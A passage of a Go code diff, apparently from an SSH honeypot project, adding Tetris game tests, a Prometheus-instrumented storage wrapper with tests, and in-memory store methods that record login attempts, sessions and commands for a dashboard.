t.Fatalf("expected screenTitle, got %d", m.screen)
}
sendKey(m, "enter")
if m.screen != screenGame {
t.Errorf("expected screenGame after keypress, got %d", m.screen)
}
if m.game == nil {
t.Fatal("game should be initialized")
}
}
func TestGameRenders(t *testing.T) {
m, _ := newTestModel(t)
sendKey(m, "enter") // start game
view := m.View()
if !strings.Contains(view, "|") {
t.Error("game view should contain board borders")
}
if !strings.Contains(view, "SCORE") {
t.Error("game view should show SCORE")
}
if !strings.Contains(view, "LEVEL") {
t.Error("game view should show LEVEL")
}
if !strings.Contains(view, "LINES") {
t.Error("game view should show LINES")
}
if !strings.Contains(view, "NEXT") {
t.Error("game view should show NEXT")
}
}
// --- Pure game logic tests ---
func TestNewGame(t *testing.T) {
g := newGame(0)
if g.gameOver {
t.Error("new game should not be game over")
}
if g.score != 0 {
t.Errorf("initial score = %d, want 0", g.score)
}
if g.level != 0 {
t.Errorf("initial level = %d, want 0", g.level)
}
if g.lines != 0 {
t.Errorf("initial lines = %d, want 0", g.lines)
}
}
func TestNewGameHardLevel(t *testing.T) {
g := newGame(5)
if g.level != 5 {
t.Errorf("hard start level = %d, want 5", g.level)
}
}
func TestMoveLeft(t *testing.T) {
g := newGame(0)
startCol := g.currentCol
g.moveLeft()
if g.currentCol != startCol-1 {
t.Errorf("after moveLeft: col = %d, want %d", g.currentCol, startCol-1)
}
}
func TestMoveRight(t *testing.T) {
g := newGame(0)
startCol := g.currentCol
g.moveRight()
if g.currentCol != startCol+1 {
t.Errorf("after moveRight: col = %d, want %d", g.currentCol, startCol+1)
}
}
func TestMoveDown(t *testing.T) {
g := newGame(0)
startRow := g.currentRow
moved := g.moveDown()
if !moved {
t.Error("moveDown should succeed from starting position")
}
if g.currentRow != startRow+1 {
t.Errorf("after moveDown: row = %d, want %d", g.currentRow, startRow+1)
}
}
func TestCannotMoveLeftBeyondWall(t *testing.T) {
g := newGame(0)
// Move all the way left.
for range boardCols {
g.moveLeft()
}
col := g.currentCol
g.moveLeft() // should not move further
if g.currentCol != col {
t.Errorf("should not move past left wall: col = %d, was %d", g.currentCol, col)
}
}
func TestCannotMoveRightBeyondWall(t *testing.T) {
g := newGame(0)
// Move all the way right.
for range boardCols {
g.moveRight()
}
col := g.currentCol
g.moveRight() // should not move further
if g.currentCol != col {
t.Errorf("should not move past right wall: col = %d, was %d", g.currentCol, col)
}
}
func TestRotate(t *testing.T) {
g := newGame(0)
startRot := g.currentRot
g.rotate()
// Rotation should change (possibly with wall kick).
if g.currentRot == startRot {
// Rotation might legitimately fail in some edge cases, so just check
// that the game state is valid.
if !g.canPlace(g.current, g.currentRot, g.currentRow, g.currentCol) {
t.Error("piece should be in a valid position after rotate attempt")
}
}
}
func TestHardDrop(t *testing.T) {
g := newGame(0)
startRow := g.currentRow
dropped := g.hardDrop()
if dropped == 0 {
t.Error("hard drop should move piece down at least some rows from top")
}
if g.currentRow <= startRow {
t.Errorf("after hardDrop: row = %d should be > %d", g.currentRow, startRow)
}
}
func TestGhostRow(t *testing.T) {
g := newGame(0)
ghost := g.ghostRow()
if ghost < g.currentRow {
t.Errorf("ghost row %d should be >= current row %d", ghost, g.currentRow)
}
// Ghost should be at a position where moving down one more is impossible.
if g.canPlace(g.current, g.currentRot, ghost+1, g.currentCol) {
t.Error("ghost row should be the lowest valid position")
}
}
func TestLockPiece(t *testing.T) {
g := newGame(0)
g.hardDrop()
pt := g.current
row, col, rot := g.currentRow, g.currentCol, g.currentRot
g.lockPiece()
// Verify that the piece's cells are now filled.
shape := pieces[pt][rot]
for _, off := range shape {
r, c := row+off[0], col+off[1]
if !g.board[r][c].filled {
t.Errorf("cell (%d, %d) should be filled after lockPiece", r, c)
}
}
}
func TestClearLines(t *testing.T) {
g := newGame(0)
// Fill the bottom row completely.
for c := range boardCols {
g.board[boardRows-1][c] = cell{filled: true, piece: pieceI}
}
cleared := g.clearLines()
if cleared != 1 {
t.Errorf("clearLines() = %d, want 1", cleared)
}
// Bottom row should now be empty (shifted from above).
for c := range boardCols {
if g.board[boardRows-1][c].filled {
t.Errorf("bottom row col %d should be empty after clearing", c)
}
}
}
func TestClearMultipleLines(t *testing.T) {
g := newGame(0)
// Fill the bottom 4 rows.
for r := boardRows - 4; r < boardRows; r++ {
for c := range boardCols {
g.board[r][c] = cell{filled: true, piece: pieceI}
}
}
cleared := g.clearLines()
if cleared != 4 {
t.Errorf("clearLines() = %d, want 4", cleared)
}
}
func TestScoring(t *testing.T) {
tests := []struct {
lines int
level int
want int
}{
{1, 0, 40},
{2, 0, 100},
{3, 0, 300},
{4, 0, 1200},
{1, 1, 80},
{4, 2, 3600},
}
for _, tt := range tests {
g := newGame(tt.level)
g.addScore(tt.lines)
if g.score != tt.want {
t.Errorf("score for %d lines at level %d = %d, want %d", tt.lines, tt.level, g.score, tt.want)
}
}
}
func TestLevelUp(t *testing.T) {
g := newGame(0)
g.lines = 9
g.addScore(1) // This should push lines to 10, triggering level 1.
if g.level != 1 {
t.Errorf("level = %d, want 1 after 10 lines", g.level)
}
}
func TestTickInterval(t *testing.T) {
if got := tickInterval(0); got != 800 {
t.Errorf("tickInterval(0) = %d, want 800", got)
}
if got := tickInterval(5); got != 500 {
t.Errorf("tickInterval(5) = %d, want 500", got)
}
// Floor at 100ms.
if got := tickInterval(20); got != 100 {
t.Errorf("tickInterval(20) = %d, want 100", got)
}
}
func TestFormatScore(t *testing.T) {
tests := []struct {
n int
want string
}{
{0, "0"},
{100, "100"},
{1250, "1,250"},
{1000000, "1,000,000"},
}
for _, tt := range tests {
if got := formatScore(tt.n); got != tt.want {
t.Errorf("formatScore(%d) = %q, want %q", tt.n, got, tt.want)
}
}
}
func TestGameOverScreen(t *testing.T) {
m, _ := newTestModel(t)
sendKey(m, "enter") // start game
// Force game over.
m.game.gameOver = true
m.screen = screenGameOver
view := m.View()
if !strings.Contains(view, "GAME OVER") {
t.Error("game over screen should show GAME OVER")
}
if !strings.Contains(view, "Score") {
t.Error("game over screen should show score")
}
}
func TestRestartFromGameOver(t *testing.T) {
m, _ := newTestModel(t)
sendKey(m, "enter") // start game
m.game.gameOver = true
m.screen = screenGameOver
sendKey(m, "r")
if m.screen != screenGame {
t.Errorf("expected screenGame after restart, got %d", m.screen)
}
if m.game.gameOver {
t.Error("game should not be over after restart")
}
}
func TestQuitFromGame(t *testing.T) {
m, _ := newTestModel(t)
sendKey(m, "enter") // start game
sendKey(m, "q")
if !m.quitting {
t.Error("should be quitting after pressing q")
}
}
func TestQuitFromGameOver(t *testing.T) {
m, _ := newTestModel(t)
sendKey(m, "enter") // start game
m.game.gameOver = true
m.screen = screenGameOver
sendKey(m, "q")
if !m.quitting {
t.Error("should be quitting after pressing q in game over")
}
}
func TestSoftDropScoring(t *testing.T) {
m, _ := newTestModel(t)
sendKey(m, "enter") // start game
scoreBefore := m.game.score
sendKey(m, "down")
if m.game.score != scoreBefore+1 {
t.Errorf("score after soft drop = %d, want %d", m.game.score, scoreBefore+1)
}
}
func TestHardDropScoring(t *testing.T) {
m, _ := newTestModel(t)
sendKey(m, "enter") // start game
// Hard drop gives 2 points per row dropped.
sendKey(m, "space")
if m.game.score < 2 {
t.Errorf("score after hard drop = %d, should be at least 2", m.game.score)
}
}
func TestTickMovesDown(t *testing.T) {
m, _ := newTestModel(t)
sendKey(m, "enter") // start game
rowBefore := m.game.currentRow
sendTick(m)
// Piece should either move down by 1, or lock and spawn a new piece at top.
movedDown := m.game.currentRow == rowBefore+1
respawned := m.game.currentRow < rowBefore
if !movedDown && !respawned && !m.game.gameOver {
t.Errorf("tick should move piece down or lock+respawn: row was %d, now %d", rowBefore, m.game.currentRow)
}
}
func TestSessionLogs(t *testing.T) {
m, store := newTestModel(t)
// Press key to start game — returns a logAction cmd.
cmd := sendKey(m, "enter")
if cmd != nil {
execCmds(cmd)
}
time.Sleep(50 * time.Millisecond)
found := false
for _, log := range store.SessionLogs {
if strings.Contains(log.Input, "GAME START") {
found = true
break
}
}
if !found {
t.Error("expected GAME START in session logs")
}
}
func TestKeypressCounter(t *testing.T) {
m, _ := newTestModel(t)
sendKey(m, "enter") // start game
sendKey(m, "left")
sendKey(m, "right")
sendKey(m, "down")
if m.keypresses != 4 { // enter + 3 game keys
t.Errorf("keypresses = %d, want 4", m.keypresses)
}
}
func TestLockDelay(t *testing.T) {
m, _ := newTestModel(t)
sendKey(m, "enter") // start game
// Drop piece to the bottom via ticks until it can't move down.
for range boardRows + 5 {
if m.locking {
break
}
sendTick(m)
}
if !m.locking {
t.Fatal("piece should be in locking state after hitting bottom")
}
// During lock delay, we should still be able to move left/right.
colBefore := m.game.currentCol
sendKey(m, "left")
if m.game.currentCol >= colBefore {
// Might not have moved if against wall, try right.
sendKey(m, "right")
}
// Sending a lockMsg should finalize the piece.
m.Update(lockMsg(time.Now()))
// After lock, a new piece should have spawned (row near top).
if m.game.currentRow > 1 && !m.game.gameOver {
t.Errorf("after lock delay, new piece should spawn near top, got row %d", m.game.currentRow)
}
}
func TestLockDelayCancelledByDrop(t *testing.T) {
m, _ := newTestModel(t)
sendKey(m, "enter") // start game
// Build a ledge: fill rows 18-19 but leave column 0 empty.
for r := boardRows - 2; r < boardRows; r++ {
for c := 1; c < boardCols; c++ {
m.game.board[r][c] = cell{filled: true, piece: pieceI}
}
}
// Move piece to column 0 area and drop it onto the ledge.
for range boardCols {
m.game.moveLeft()
}
// Tick down until locking.
for range boardRows + 5 {
if m.locking {
break
}
sendTick(m)
}
// If piece is on the ledge and we slide it to col 0 (open column),
// the lock delay should cancel since it can fall further.
// This test just validates the locking flag logic works.
if m.locking {
// Try moving — if piece can drop further, locking should cancel.
sendKey(m, "left")
// Whether locking cancels depends on the board state; just verify no crash.
}
}
func TestSpawnCol(t *testing.T) {
// All pieces should spawn roughly centered.
for pt := range pieceType(numPieceTypes) {
col := spawnCol(pt, 0)
if col < 0 || col > boardCols-1 {
t.Errorf("spawnCol(%d, 0) = %d, out of range", pt, col)
}
// Verify piece fits at spawn position.
shape := pieces[pt][0]
for _, off := range shape {
c := col + off[1]
if c < 0 || c >= boardCols {
t.Errorf("piece %d overflows board at spawn: col+offset = %d", pt, c)
}
}
}
}

View File

@@ -0,0 +1,217 @@
package storage
import (
"context"
"time"
"github.com/prometheus/client_golang/prometheus"
)
// InstrumentedStore wraps a Store and records query duration and errors
// as Prometheus metrics for each method call.
type InstrumentedStore struct {
store Store
queryDuration *prometheus.HistogramVec
queryErrors *prometheus.CounterVec
}
// NewInstrumentedStore returns a new InstrumentedStore wrapping the given store.
func NewInstrumentedStore(store Store, queryDuration *prometheus.HistogramVec, queryErrors *prometheus.CounterVec) *InstrumentedStore {
return &InstrumentedStore{
store: store,
queryDuration: queryDuration,
queryErrors: queryErrors,
}
}
func observe[T any](s *InstrumentedStore, method string, fn func() (T, error)) (T, error) {
timer := prometheus.NewTimer(s.queryDuration.WithLabelValues(method))
v, err := fn()
timer.ObserveDuration()
if err != nil {
s.queryErrors.WithLabelValues(method).Inc()
}
return v, err
}
func observeErr(s *InstrumentedStore, method string, fn func() error) error {
timer := prometheus.NewTimer(s.queryDuration.WithLabelValues(method))
err := fn()
timer.ObserveDuration()
if err != nil {
s.queryErrors.WithLabelValues(method).Inc()
}
return err
}
func (s *InstrumentedStore) RecordLoginAttempt(ctx context.Context, username, password, ip, country string) error {
return observeErr(s, "RecordLoginAttempt", func() error {
return s.store.RecordLoginAttempt(ctx, username, password, ip, country)
})
}
func (s *InstrumentedStore) CreateSession(ctx context.Context, ip, username, shellName, country string) (string, error) {
return observe(s, "CreateSession", func() (string, error) {
return s.store.CreateSession(ctx, ip, username, shellName, country)
})
}
func (s *InstrumentedStore) EndSession(ctx context.Context, sessionID string, disconnectedAt time.Time) error {
return observeErr(s, "EndSession", func() error {
return s.store.EndSession(ctx, sessionID, disconnectedAt)
})
}
func (s *InstrumentedStore) UpdateHumanScore(ctx context.Context, sessionID string, score float64) error {
return observeErr(s, "UpdateHumanScore", func() error {
return s.store.UpdateHumanScore(ctx, sessionID, score)
})
}
func (s *InstrumentedStore) SetExecCommand(ctx context.Context, sessionID string, command string) error {
return observeErr(s, "SetExecCommand", func() error {
return s.store.SetExecCommand(ctx, sessionID, command)
})
}
func (s *InstrumentedStore) AppendSessionLog(ctx context.Context, sessionID, input, output string) error {
return observeErr(s, "AppendSessionLog", func() error {
return s.store.AppendSessionLog(ctx, sessionID, input, output)
})
}
func (s *InstrumentedStore) DeleteRecordsBefore(ctx context.Context, cutoff time.Time) (int64, error) {
return observe(s, "DeleteRecordsBefore", func() (int64, error) {
return s.store.DeleteRecordsBefore(ctx, cutoff)
})
}
func (s *InstrumentedStore) GetDashboardStats(ctx context.Context) (*DashboardStats, error) {
return observe(s, "GetDashboardStats", func() (*DashboardStats, error) {
return s.store.GetDashboardStats(ctx)
})
}
func (s *InstrumentedStore) GetTopUsernames(ctx context.Context, limit int) ([]TopEntry, error) {
return observe(s, "GetTopUsernames", func() ([]TopEntry, error) {
return s.store.GetTopUsernames(ctx, limit)
})
}
func (s *InstrumentedStore) GetTopPasswords(ctx context.Context, limit int) ([]TopEntry, error) {
return observe(s, "GetTopPasswords", func() ([]TopEntry, error) {
return s.store.GetTopPasswords(ctx, limit)
})
}
func (s *InstrumentedStore) GetTopIPs(ctx context.Context, limit int) ([]TopEntry, error) {
return observe(s, "GetTopIPs", func() ([]TopEntry, error) {
return s.store.GetTopIPs(ctx, limit)
})
}
func (s *InstrumentedStore) GetTopCountries(ctx context.Context, limit int) ([]TopEntry, error) {
return observe(s, "GetTopCountries", func() ([]TopEntry, error) {
return s.store.GetTopCountries(ctx, limit)
})
}
func (s *InstrumentedStore) GetTopExecCommands(ctx context.Context, limit int) ([]TopEntry, error) {
return observe(s, "GetTopExecCommands", func() ([]TopEntry, error) {
return s.store.GetTopExecCommands(ctx, limit)
})
}
func (s *InstrumentedStore) GetRecentSessions(ctx context.Context, limit int, activeOnly bool) ([]Session, error) {
return observe(s, "GetRecentSessions", func() ([]Session, error) {
return s.store.GetRecentSessions(ctx, limit, activeOnly)
})
}
func (s *InstrumentedStore) GetFilteredSessions(ctx context.Context, limit int, activeOnly bool, f DashboardFilter) ([]Session, error) {
return observe(s, "GetFilteredSessions", func() ([]Session, error) {
return s.store.GetFilteredSessions(ctx, limit, activeOnly, f)
})
}
func (s *InstrumentedStore) GetSession(ctx context.Context, sessionID string) (*Session, error) {
return observe(s, "GetSession", func() (*Session, error) {
return s.store.GetSession(ctx, sessionID)
})
}
func (s *InstrumentedStore) GetSessionLogs(ctx context.Context, sessionID string) ([]SessionLog, error) {
return observe(s, "GetSessionLogs", func() ([]SessionLog, error) {
return s.store.GetSessionLogs(ctx, sessionID)
})
}
func (s *InstrumentedStore) AppendSessionEvents(ctx context.Context, events []SessionEvent) error {
return observeErr(s, "AppendSessionEvents", func() error {
return s.store.AppendSessionEvents(ctx, events)
})
}
func (s *InstrumentedStore) GetSessionEvents(ctx context.Context, sessionID string) ([]SessionEvent, error) {
return observe(s, "GetSessionEvents", func() ([]SessionEvent, error) {
return s.store.GetSessionEvents(ctx, sessionID)
})
}
func (s *InstrumentedStore) CloseActiveSessions(ctx context.Context, disconnectedAt time.Time) (int64, error) {
return observe(s, "CloseActiveSessions", func() (int64, error) {
return s.store.CloseActiveSessions(ctx, disconnectedAt)
})
}
func (s *InstrumentedStore) GetAttemptsOverTime(ctx context.Context, days int, since, until *time.Time) ([]TimeSeriesPoint, error) {
return observe(s, "GetAttemptsOverTime", func() ([]TimeSeriesPoint, error) {
return s.store.GetAttemptsOverTime(ctx, days, since, until)
})
}
func (s *InstrumentedStore) GetHourlyPattern(ctx context.Context, since, until *time.Time) ([]HourlyCount, error) {
return observe(s, "GetHourlyPattern", func() ([]HourlyCount, error) {
return s.store.GetHourlyPattern(ctx, since, until)
})
}
func (s *InstrumentedStore) GetCountryStats(ctx context.Context) ([]CountryCount, error) {
return observe(s, "GetCountryStats", func() ([]CountryCount, error) {
return s.store.GetCountryStats(ctx)
})
}
func (s *InstrumentedStore) GetFilteredDashboardStats(ctx context.Context, f DashboardFilter) (*DashboardStats, error) {
return observe(s, "GetFilteredDashboardStats", func() (*DashboardStats, error) {
return s.store.GetFilteredDashboardStats(ctx, f)
})
}
func (s *InstrumentedStore) GetFilteredTopUsernames(ctx context.Context, limit int, f DashboardFilter) ([]TopEntry, error) {
return observe(s, "GetFilteredTopUsernames", func() ([]TopEntry, error) {
return s.store.GetFilteredTopUsernames(ctx, limit, f)
})
}
func (s *InstrumentedStore) GetFilteredTopPasswords(ctx context.Context, limit int, f DashboardFilter) ([]TopEntry, error) {
return observe(s, "GetFilteredTopPasswords", func() ([]TopEntry, error) {
return s.store.GetFilteredTopPasswords(ctx, limit, f)
})
}
func (s *InstrumentedStore) GetFilteredTopIPs(ctx context.Context, limit int, f DashboardFilter) ([]TopEntry, error) {
return observe(s, "GetFilteredTopIPs", func() ([]TopEntry, error) {
return s.store.GetFilteredTopIPs(ctx, limit, f)
})
}
func (s *InstrumentedStore) GetFilteredTopCountries(ctx context.Context, limit int, f DashboardFilter) ([]TopEntry, error) {
return observe(s, "GetFilteredTopCountries", func() ([]TopEntry, error) {
return s.store.GetFilteredTopCountries(ctx, limit, f)
})
}
func (s *InstrumentedStore) Close() error {
return s.store.Close()
}

View File

@@ -0,0 +1,163 @@
package storage
import (
"context"
"errors"
"testing"
"time"
"github.com/prometheus/client_golang/prometheus"
dto "github.com/prometheus/client_model/go"
)
func newTestInstrumented() (*InstrumentedStore, *prometheus.HistogramVec, *prometheus.CounterVec) {
dur := prometheus.NewHistogramVec(prometheus.HistogramOpts{
Name: "test_query_duration_seconds",
Help: "test",
Buckets: []float64{0.001, 0.01, 0.1, 1},
}, []string{"method"})
errs := prometheus.NewCounterVec(prometheus.CounterOpts{
Name: "test_query_errors_total",
Help: "test",
}, []string{"method"})
store := NewMemoryStore()
return NewInstrumentedStore(store, dur, errs), dur, errs
}
func getHistogramCount(h *prometheus.HistogramVec, method string) uint64 {
m := &dto.Metric{}
h.WithLabelValues(method).(prometheus.Histogram).Write(m)
return m.GetHistogram().GetSampleCount()
}
func getCounterValue(c *prometheus.CounterVec, method string) float64 {
m := &dto.Metric{}
c.WithLabelValues(method).Write(m)
return m.GetCounter().GetValue()
}
func TestInstrumentedStoreDelegation(t *testing.T) {
s, dur, _ := newTestInstrumented()
ctx := context.Background()
// RecordLoginAttempt should delegate and record duration.
err := s.RecordLoginAttempt(ctx, "root", "pass", "1.2.3.4", "US")
if err != nil {
t.Fatalf("RecordLoginAttempt: %v", err)
}
if c := getHistogramCount(dur, "RecordLoginAttempt"); c != 1 {
t.Fatalf("expected 1 observation, got %d", c)
}
// CreateSession should delegate and return a valid ID.
id, err := s.CreateSession(ctx, "1.2.3.4", "root", "bash", "US")
if err != nil {
t.Fatalf("CreateSession: %v", err)
}
if id == "" {
t.Fatal("CreateSession returned empty ID")
}
if c := getHistogramCount(dur, "CreateSession"); c != 1 {
t.Fatalf("expected 1 observation, got %d", c)
}
// GetDashboardStats should delegate.
stats, err := s.GetDashboardStats(ctx)
if err != nil {
t.Fatalf("GetDashboardStats: %v", err)
}
if stats == nil {
t.Fatal("GetDashboardStats returned nil")
}
if c := getHistogramCount(dur, "GetDashboardStats"); c != 1 {
t.Fatalf("expected 1 observation, got %d", c)
}
}
func TestInstrumentedStoreErrorCounting(t *testing.T) {
dur := prometheus.NewHistogramVec(prometheus.HistogramOpts{
Name: "test_ec_query_duration_seconds",
Help: "test",
Buckets: []float64{0.001, 0.01, 0.1, 1},
}, []string{"method"})
errs := prometheus.NewCounterVec(prometheus.CounterOpts{
Name: "test_ec_query_errors_total",
Help: "test",
}, []string{"method"})
es := &errorStore{}
s := NewInstrumentedStore(es, dur, errs)
ctx := context.Background()
// Error should be counted.
err := s.EndSession(ctx, "nonexistent", time.Now())
if !errors.Is(err, errFake) {
t.Fatalf("expected errFake, got %v", err)
}
if c := getHistogramCount(dur, "EndSession"); c != 1 {
t.Fatalf("expected 1 observation, got %d", c)
}
if c := getCounterValue(errs, "EndSession"); c != 1 {
t.Fatalf("expected error count 1, got %f", c)
}
// Successful call should not increment error counter.
s2, _, errs2 := newTestInstrumented()
err = s2.RecordLoginAttempt(ctx, "root", "pass", "1.2.3.4", "US")
if err != nil {
t.Fatalf("RecordLoginAttempt: %v", err)
}
if c := getCounterValue(errs2, "RecordLoginAttempt"); c != 0 {
t.Fatalf("expected error count 0, got %f", c)
}
}
// errorStore is a Store that returns errors for all methods.
type errorStore struct {
MemoryStore
}
var errFake = errors.New("fake error")
func (s *errorStore) RecordLoginAttempt(context.Context, string, string, string, string) error {
return errFake
}
func (s *errorStore) EndSession(context.Context, string, time.Time) error {
return errFake
}
func TestInstrumentedStoreObserveErr(t *testing.T) {
dur := prometheus.NewHistogramVec(prometheus.HistogramOpts{
Name: "test2_query_duration_seconds",
Help: "test",
Buckets: []float64{0.001, 0.01, 0.1, 1},
}, []string{"method"})
errs := prometheus.NewCounterVec(prometheus.CounterOpts{
Name: "test2_query_errors_total",
Help: "test",
}, []string{"method"})
es := &errorStore{}
s := NewInstrumentedStore(es, dur, errs)
ctx := context.Background()
err := s.RecordLoginAttempt(ctx, "root", "pass", "1.2.3.4", "US")
if !errors.Is(err, errFake) {
t.Fatalf("expected errFake, got %v", err)
}
if c := getCounterValue(errs, "RecordLoginAttempt"); c != 1 {
t.Fatalf("expected error count 1, got %f", c)
}
if c := getHistogramCount(dur, "RecordLoginAttempt"); c != 1 {
t.Fatalf("expected 1 observation, got %d", c)
}
}
func TestInstrumentedStoreClose(t *testing.T) {
s, _, _ := newTestInstrumented()
if err := s.Close(); err != nil {
t.Fatalf("Close: %v", err)
}
}

View File

@@ -2,6 +2,7 @@ package storage
import ( import (
"context" "context"
"sort"
"sync" "sync"
"time" "time"
@@ -14,6 +15,7 @@ type MemoryStore struct {
LoginAttempts []LoginAttempt LoginAttempts []LoginAttempt
Sessions map[string]*Session Sessions map[string]*Session
SessionLogs []SessionLog SessionLogs []SessionLog
SessionEvents []SessionEvent
} }
// NewMemoryStore returns a new empty MemoryStore. // NewMemoryStore returns a new empty MemoryStore.
@@ -23,7 +25,7 @@ func NewMemoryStore() *MemoryStore {
} }
} }
func (m *MemoryStore) RecordLoginAttempt(_ context.Context, username, password, ip string) error { func (m *MemoryStore) RecordLoginAttempt(_ context.Context, username, password, ip, country string) error {
m.mu.Lock() m.mu.Lock()
defer m.mu.Unlock() defer m.mu.Unlock()
@@ -33,6 +35,7 @@ func (m *MemoryStore) RecordLoginAttempt(_ context.Context, username, password,
if a.Username == username && a.Password == password && a.IP == ip { if a.Username == username && a.Password == password && a.IP == ip {
a.Count++ a.Count++
a.LastSeen = now a.LastSeen = now
a.Country = country
return nil return nil
} }
} }
@@ -42,6 +45,7 @@ func (m *MemoryStore) RecordLoginAttempt(_ context.Context, username, password,
Username: username, Username: username,
Password: password, Password: password,
IP: ip, IP: ip,
Country: country,
Count: 1, Count: 1,
FirstSeen: now, FirstSeen: now,
LastSeen: now, LastSeen: now,
@@ -49,7 +53,7 @@ func (m *MemoryStore) RecordLoginAttempt(_ context.Context, username, password,
return nil return nil
} }
func (m *MemoryStore) CreateSession(_ context.Context, ip, username, shellName string) (string, error) { func (m *MemoryStore) CreateSession(_ context.Context, ip, username, shellName, country string) (string, error) {
m.mu.Lock() m.mu.Lock()
defer m.mu.Unlock() defer m.mu.Unlock()
@@ -58,6 +62,7 @@ func (m *MemoryStore) CreateSession(_ context.Context, ip, username, shellName s
m.Sessions[id] = &Session{ m.Sessions[id] = &Session{
ID: id, ID: id,
IP: ip, IP: ip,
Country: country,
Username: username, Username: username,
ShellName: shellName, ShellName: shellName,
ConnectedAt: now, ConnectedAt: now,
@@ -86,6 +91,16 @@ func (m *MemoryStore) UpdateHumanScore(_ context.Context, sessionID string, scor
return nil return nil
} }
func (m *MemoryStore) SetExecCommand(_ context.Context, sessionID string, command string) error {
m.mu.Lock()
defer m.mu.Unlock()
if s, ok := m.Sessions[sessionID]; ok {
s.ExecCommand = &command
}
return nil
}
func (m *MemoryStore) AppendSessionLog(_ context.Context, sessionID, input, output string) error { func (m *MemoryStore) AppendSessionLog(_ context.Context, sessionID, input, output string) error {
m.mu.Lock() m.mu.Lock()
defer m.mu.Unlock() defer m.mu.Unlock()
@@ -100,6 +115,55 @@ func (m *MemoryStore) AppendSessionLog(_ context.Context, sessionID, input, outp
return nil return nil
} }
func (m *MemoryStore) GetSession(_ context.Context, sessionID string) (*Session, error) {
m.mu.Lock()
defer m.mu.Unlock()
s, ok := m.Sessions[sessionID]
if !ok {
return nil, nil
}
copy := *s
return &copy, nil
}
func (m *MemoryStore) GetSessionLogs(_ context.Context, sessionID string) ([]SessionLog, error) {
m.mu.Lock()
defer m.mu.Unlock()
var logs []SessionLog
for _, l := range m.SessionLogs {
if l.SessionID == sessionID {
logs = append(logs, l)
}
}
sort.Slice(logs, func(i, j int) bool {
return logs[i].Timestamp.Before(logs[j].Timestamp)
})
return logs, nil
}
func (m *MemoryStore) AppendSessionEvents(_ context.Context, events []SessionEvent) error {
m.mu.Lock()
defer m.mu.Unlock()
m.SessionEvents = append(m.SessionEvents, events...)
return nil
}
func (m *MemoryStore) GetSessionEvents(_ context.Context, sessionID string) ([]SessionEvent, error) {
m.mu.Lock()
defer m.mu.Unlock()
var events []SessionEvent
for _, e := range m.SessionEvents {
if e.SessionID == sessionID {
events = append(events, e)
}
}
return events, nil
}
func (m *MemoryStore) DeleteRecordsBefore(_ context.Context, cutoff time.Time) (int64, error) { func (m *MemoryStore) DeleteRecordsBefore(_ context.Context, cutoff time.Time) (int64, error) {
m.mu.Lock() m.mu.Lock()
defer m.mu.Unlock() defer m.mu.Unlock()
@@ -135,9 +199,511 @@ func (m *MemoryStore) DeleteRecordsBefore(_ context.Context, cutoff time.Time) (
} }
m.SessionLogs = keptLogs m.SessionLogs = keptLogs
keptEvents := m.SessionEvents[:0]
for _, e := range m.SessionEvents {
if _, ok := m.Sessions[e.SessionID]; ok {
keptEvents = append(keptEvents, e)
} else {
total++
}
}
m.SessionEvents = keptEvents
return total, nil return total, nil
} }
func (m *MemoryStore) GetDashboardStats(_ context.Context) (*DashboardStats, error) {
m.mu.Lock()
defer m.mu.Unlock()
stats := &DashboardStats{}
ips := make(map[string]struct{})
for _, a := range m.LoginAttempts {
stats.TotalAttempts += int64(a.Count)
ips[a.IP] = struct{}{}
}
stats.UniqueIPs = int64(len(ips))
stats.TotalSessions = int64(len(m.Sessions))
for _, s := range m.Sessions {
if s.DisconnectedAt == nil {
stats.ActiveSessions++
}
}
return stats, nil
}
func (m *MemoryStore) GetTopUsernames(_ context.Context, limit int) ([]TopEntry, error) {
m.mu.Lock()
defer m.mu.Unlock()
return m.topN("username", limit), nil
}
func (m *MemoryStore) GetTopPasswords(_ context.Context, limit int) ([]TopEntry, error) {
m.mu.Lock()
defer m.mu.Unlock()
return m.topN("password", limit), nil
}
func (m *MemoryStore) GetTopIPs(_ context.Context, limit int) ([]TopEntry, error) {
m.mu.Lock()
defer m.mu.Unlock()
type ipInfo struct {
count int64
country string
}
agg := make(map[string]*ipInfo)
for _, a := range m.LoginAttempts {
info, ok := agg[a.IP]
if !ok {
info = &ipInfo{}
agg[a.IP] = info
}
info.count += int64(a.Count)
if a.Country != "" {
info.country = a.Country
}
}
entries := make([]TopEntry, 0, len(agg))
for ip, info := range agg {
entries = append(entries, TopEntry{Value: ip, Country: info.country, Count: info.count})
}
sort.Slice(entries, func(i, j int) bool {
return entries[i].Count > entries[j].Count
})
if limit > 0 && len(entries) > limit {
entries = entries[:limit]
}
return entries, nil
}
func (m *MemoryStore) GetTopCountries(_ context.Context, limit int) ([]TopEntry, error) {
m.mu.Lock()
defer m.mu.Unlock()
counts := make(map[string]int64)
for _, a := range m.LoginAttempts {
if a.Country == "" {
continue
}
counts[a.Country] += int64(a.Count)
}
entries := make([]TopEntry, 0, len(counts))
for k, v := range counts {
entries = append(entries, TopEntry{Value: k, Count: v})
}
sort.Slice(entries, func(i, j int) bool {
return entries[i].Count > entries[j].Count
})
if limit > 0 && len(entries) > limit {
entries = entries[:limit]
}
return entries, nil
}
// topN aggregates login attempts by the given field and returns the top N. Must be called with m.mu held.
func (m *MemoryStore) topN(field string, limit int) []TopEntry {
counts := make(map[string]int64)
for _, a := range m.LoginAttempts {
var key string
switch field {
case "username":
key = a.Username
case "password":
key = a.Password
case "ip":
key = a.IP
}
counts[key] += int64(a.Count)
}
entries := make([]TopEntry, 0, len(counts))
for k, v := range counts {
entries = append(entries, TopEntry{Value: k, Count: v})
}
sort.Slice(entries, func(i, j int) bool {
return entries[i].Count > entries[j].Count
})
if limit > 0 && len(entries) > limit {
entries = entries[:limit]
}
return entries
}
func (m *MemoryStore) GetRecentSessions(_ context.Context, limit int, activeOnly bool) ([]Session, error) {
m.mu.Lock()
defer m.mu.Unlock()
return m.collectSessions(limit, activeOnly, DashboardFilter{}), nil
}
func (m *MemoryStore) GetFilteredSessions(_ context.Context, limit int, activeOnly bool, f DashboardFilter) ([]Session, error) {
m.mu.Lock()
defer m.mu.Unlock()
return m.collectSessions(limit, activeOnly, f), nil
}
// collectSessions gathers sessions matching filter criteria. Must be called with m.mu held.
func (m *MemoryStore) collectSessions(limit int, activeOnly bool, f DashboardFilter) []Session {
// Compute event counts and input bytes per session.
eventCounts := make(map[string]int)
inputBytes := make(map[string]int64)
for _, e := range m.SessionEvents {
eventCounts[e.SessionID]++
if e.Direction == 0 {
inputBytes[e.SessionID] += int64(len(e.Data))
}
}
var sessions []Session
for _, s := range m.Sessions {
if activeOnly && s.DisconnectedAt != nil {
continue
}
if !matchesSessionFilter(s, f) {
continue
}
sess := *s
